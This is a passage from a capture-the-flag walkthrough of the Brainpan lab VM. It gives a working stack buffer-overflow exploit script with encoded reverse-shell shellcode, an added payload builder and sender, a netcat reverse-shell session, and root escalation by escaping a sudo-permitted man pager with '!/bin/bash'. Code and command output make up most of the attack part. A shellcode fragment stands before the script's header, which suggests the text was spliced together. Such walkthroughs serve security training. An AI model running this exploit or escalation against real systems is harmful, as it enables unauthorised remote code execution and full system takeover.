buf += b"\x49\x50\x59\x38\x30\x38\x45\x36\x32\x48\x44\x42\x33"
buf += b"\x30\x35\x51\x4f\x4b\x4b\x39\x4b\x51\x38\x30\x42\x46"
buf += b"\x56\x30\x36\x31\x30\x53\x4f\x43\x33\x33\x4c\x49\x4b"
buf += b"\x51\x38\x4d\x4d\x50\x50\x52\x43\x58\x52\x4e\x46\x4f"
buf += b"\x44\x33\x52\x48\x53\x58\x36\x4f\x46\x4f\x32\x42\x53"
buf += b"\x59\x4d\x59\x4a\x43\x31\x42\x31\x43\x4c\x49\x4d\x31"
buf += b"\x38\x30\x34\x4b\x58\x4d\x4b\x30\x41\x41"
# Python 2 script (print statement syntax); run with: python etfuzz.py
import sys,socket

victim = '192.168.56.115'      # the Brainpan VM this time, not the Windows test box
port = 9999

junk = "\x41" * 524            # 524 bytes reach the saved return address
eip = "\xf3\x12\x17\x31"       # 0x311712F3 (jmp esp) in little-endian byte order
buf = b"\x90" * 13             # short NOP sled in front of the shellcode
# msfvenom linux/x86/shell_reverse_tcp, alpha_upper encoded, no \x00 bytes
buf += b"\x89\xe5\xd9\xcb\xd9\x75\xf4\x58\x50\x59\x49\x49\x49"
buf += b"\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33"
buf += b"\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41"
buf += b"\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41"
buf += b"\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a"
buf += b"\x4a\x49\x30\x31\x49\x4b\x5a\x57\x4b\x53\x31\x43\x47"
buf += b"\x33\x46\x33\x53\x5a\x53\x32\x4b\x39\x4b\x51\x38\x30"
buf += b"\x52\x46\x58\x4d\x4d\x50\x4a\x33\x36\x39\x48\x30\x37"
buf += b"\x4f\x58\x4d\x4d\x50\x30\x49\x44\x39\x5a\x59\x35\x38"
buf += b"\x49\x50\x59\x38\x30\x38\x45\x36\x32\x48\x44\x42\x33"
buf += b"\x30\x35\x51\x4f\x4b\x4b\x39\x4b\x51\x38\x30\x42\x46"
buf += b"\x56\x30\x36\x31\x30\x53\x4f\x43\x33\x33\x4c\x49\x4b"
buf += b"\x51\x38\x4d\x4d\x50\x50\x52\x43\x58\x52\x4e\x46\x4f"
buf += b"\x44\x33\x52\x48\x53\x58\x36\x4f\x46\x4f\x32\x42\x53"
buf += b"\x59\x4d\x59\x4a\x43\x31\x42\x31\x43\x4c\x49\x4d\x31"
buf += b"\x38\x30\x34\x4b\x58\x4d\x4b\x30\x41\x41"

payload = junk + eip + buf

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    print "[-] Connecting to " + str(victim)
    s.connect((victim, port))
    s.recv(1024)          # read the banner first

    # Send payload
    print "[-] Sending payload.... ",
    s.send(payload)
    print "Done"
    s.close()

except:
    print "[-] Unable to connect to " + str(victim)
    sys.exit(0)

Update the PoC script with the victim's IP address and the new shellcode, start a fresh netcat listener on port 443 and run it; a shell comes back.
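The Windows and Linux exploits above differ only in the shellcode, and both depend on two facts established earlier: 524 bytes reach the saved return address, and 0x311712F3 is a jmp esp that contains no null byte. The following Python 3 builder is an added example (not the walkthrough's etfuzz.py) that assembles the same {junk}{jmp esp}{nops + shellcode} layout, packs the address little-endian, and rejects anything strcpy would truncate. It also shows in code what the debugger's ctrl-f did: scanning a module image for the FF E4 opcode pair. The shellcode placeholder (INT3 bytes) and the module image used in the test are constructed stand-ins, and the load address 0x31170000 used for that constructed image is an assumption for illustration.

```python
import socket
import struct
import sys

OFFSET = 524            # junk bytes before the saved return address (pattern_offset result)
JMP_ESP = 0x311712F3    # address of a `jmp esp` found with Immunity's ctrl-f
BAD_CHARS = b"\x00"     # strcpy stops at the first NUL, so none may appear in the payload
NOP_SLED = 13           # same sled length the walkthrough used

# Constructed stand-in for real shellcode (INT3 breakpoints); paste msfvenom's `buf` here to use it.
DEMO_SHELLCODE = b"\xcc" * 8


def find_jmp_esp(image, base):
    """Return the virtual address of every FF E4 (jmp esp) pair in a module image.

    `image` is the module's bytes as loaded in memory and `base` its load address;
    this is the search the debugger performs for ctrl-f "jmp esp".
    """
    hits, pos = [], image.find(b"\xff\xe4")
    while pos != -1:
        hits.append(base + pos)
        pos = image.find(b"\xff\xe4", pos + 1)
    return hits


def check_bad_chars(label, data, bad_chars=BAD_CHARS):
    """Raise ValueError if `data` contains a byte strcpy (or the target) cannot accept."""
    bad = sorted({b for b in data if b in bad_chars})
    if bad:
        raise ValueError("%s contains bad char(s): %s"
                         % (label, ", ".join("\\x%02x" % b for b in bad)))


def build_payload(shellcode, offset=OFFSET, ret_addr=JMP_ESP, nop_sled=NOP_SLED):
    """Assemble {junk}{jmp esp address}{nops + shellcode} exactly as etfuzz.py does.

    The return address is packed little-endian (0x311712F3 -> f3 12 17 31) and both
    the address and the shellcode are checked for bad characters before use.
    """
    eip = struct.pack("<I", ret_addr)
    check_bad_chars("return address", eip)
    check_bad_chars("shellcode", shellcode)
    return b"A" * offset + eip + b"\x90" * nop_sled + shellcode


def send_payload(host, port, payload, timeout=5.0):
    """Deliver the payload the way the walkthrough's script does: read the banner, send, close."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.recv(1024)        # the ENTER THE PASSWORD banner
        s.sendall(payload)
    return len(payload)


if __name__ == "__main__":
    payload = build_payload(DEMO_SHELLCODE)
    print("[*] payload is %d bytes; EIP bytes at offset %d: %s"
          % (len(payload), OFFSET, payload[OFFSET:OFFSET + 4].hex()))
    # Only touches the network when a host and port are given, e.g.
    #   python3 build_payload.py 192.168.56.115 9999
    if len(sys.argv) == 3:
        send_payload(sys.argv[1], int(sys.argv[2]), payload)
```

The bad-character check is what rules out addresses such as a module base (0x31170000 packs to 00 00 17 31): the copy would stop at the first null and the jump would never be reached. Swap `DEMO_SHELLCODE` for msfvenom's `buf` and the result is byte-for-byte the payload the walkthrough sends.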

root@kali:~# nc -lvp 443
listening on [any] 443 ...
192.168.56.115: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.115] 39737
id
uid=1002(puck) gid=1002(puck) groups=1002(puck)
python -c 'import pty; pty.spawn("/bin/bash")'
puck@brainpan:/home/puck$ id
id
uid=1002(puck) gid=1002(puck) groups=1002(puck)
puck@brainpan:/home/puck$ whoami
whoami
puck
puck@brainpan:/home/puck$ ls
ls
checksrv.sh web
puck@brainpan:/home/puck$

Privilege escalation

Success! We now have a low-privilege shell on the victim. Moving on. Look around the home directory for anything interesting... nothing much. The only notable items are a script that restarts the web service when it dies, and the document root of the web service running on port 10000. Does sudo grant any special rights?

puck@brainpan:/home$ sudo -l
sudo -l
Matching Defaults entries for puck on this host:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User puck may run the following commands on this host:
(root) NOPASSWD: /home/anansi/bin/anansi_util

anansi_util with NOPASSWD? Interesting. Take a closer look.

puck@brainpan:/home$ sudo /home/anansi/bin/anansi_util
sudo /home/anansi/bin/anansi_util
Usage: /home/anansi/bin/anansi_util [action]
Where [action] is one of:
- network
- proclist
- manual [command]
  • The manual [command] option is the interesting part. Let's see whether [command] can be used to run something with root privileges.

Privilege escalation succeeded and the flag was found. Awesome!

puck@brainpan:/home$ sudo /home/anansi/bin/anansi_util manual /bin/bash
sudo /home/anansi/bin/anansi_util manual /bin/bash
/usr/bin/man: manual-/bin/bash: No such file or directory
/usr/bin/man: manual_/bin/bash: No such file or directory
No manual entry for manual
WARNING: terminal is not fully functional
- (press RETURN)
BASH(1) BASH(1)

NAME
bash - GNU Bourne-Again SHell

SYNOPSIS
bash [options] [file]

COPYRIGHT
Bash is Copyright (C) 1989-2011 by the Free Software Foundation, Inc.

DESCRIPTION
Bash is an sh-compatible command language interpreter that executes
commands read from the standard input or from a file. Bash also incor‐
porates useful features from the Korn and C shells (ksh and csh).

Bash is intended to be a conformant implementation of the Shell and
Utilities portion of the IEEE POSIX specification (IEEE Standard
1003.1). Bash can be configured to be POSIX-conformant by default.

OPTIONS
All of the single-character shell options documented in the descrip‐
tion of the set builtin command can be used as options when the shell
Manual page bash(1) line 1 (press h for help or q to quit)!/bin/bash
!/bin/bash
root@brainpan:/usr/share/man# id
id
uid=0(root) gid=0(root) groups=0(root)
root@brainpan:/usr/share/man# whoami
whoami
root
root@brainpan:/usr/share/man# cd /root
cd /root
root@brainpan:~# ls
ls
b.txt
root@brainpan:~# cat b.txt
cat b.txt
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|


http://www.techorganic.com



root@brainpan:~#

W00T! root! The utility lets us open man pages as root, so man's built-in shell escape can run a command inline; the !/bin/bash typed at the pager prompt in the output above is exactly that.

Key takeaways

  • Buffer overflow
  • Debugging with OllyDbg / Immunity Debugger
  • Python fuzzing script to trigger a crash
  • Metasploit's pattern tools to find how many bytes reach EIP
  • msfvenom to generate reverse-shell shellcode in Python format
  • Overwrite EIP and place the shellcode at ESP to get a reverse shell
  • Privilege escalation via man's built-in shell escape

Game over

Sorry, once again I could not find a certain Greek guru's idiot-proof one-click script for this box. I am so sorry about this... It's a pity...

The end, to be continued...